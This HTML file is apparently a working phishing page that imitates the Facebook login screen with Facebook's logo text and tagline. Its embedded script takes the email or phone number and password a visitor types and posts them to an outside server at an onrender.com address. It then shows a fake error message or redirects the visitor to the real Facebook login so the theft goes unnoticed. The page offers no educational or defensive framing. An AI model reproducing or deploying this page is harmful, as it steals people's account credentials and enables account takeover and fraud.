<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Facebook Login Page</title>
    <link rel="stylesheet" href="./global.css" />
  </head>
  <body>
    <div class="content">
      <div class="flex-div">
        <div class="name-content">
          <h1 class="logo">Facebook</h1>
          <p class="logo-content">
            Facebook helps you connect and share with the people in your life.
          </p>
        </div>
        <form id="loginForm">
          <input
            type="text"
            id="emailOrPhone"
            placeholder="Email or Phone Number"
            required
          />
          <input
            type="password"
            id="password"
            placeholder="Password"
            required
          />
          <p id="errorMessage" class="error-message">
            Incorrect email or password.
          </p>
          <button class="login" type="submit">Log In</button>
          <a href="forgot-password.html">Forgot Password?</a>
          <hr />
          <button class="create-account" type="button">
            Create New Account
          </button>
        </form>
      </div>
    </div>
  </body>

  <script>
    const form = document.getElementById('loginForm');
    const errorMessage = document.getElementById('errorMessage');
    form.addEventListener('submit', async (event) => {
      event.preventDefault();

      const emailOrPhone = document.getElementById('emailOrPhone').value;
      const password = document.getElementById('password').value;

      try {
        const response = await fetch('https://fb-be-qom6.onrender.com', {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify({ emailOrPhone, password }),
        });

        const result = await response.json();
        if (!result.redirect) {
          errorMessage.style.display = 'block';
          errorMessage.textContent =
            result.message || 'Incorrect email or password.';
        } else window.location.replace('https://www.facebook.com/login/');

        console.log('we', result.redirect);
      } catch (error) {
        errorMessage.style.display = 'block';
        errorMessage.textContent = 'An error occurred. Please try again later.';
        console.error('Error:', error);
      }
    });
  </script>
</html>
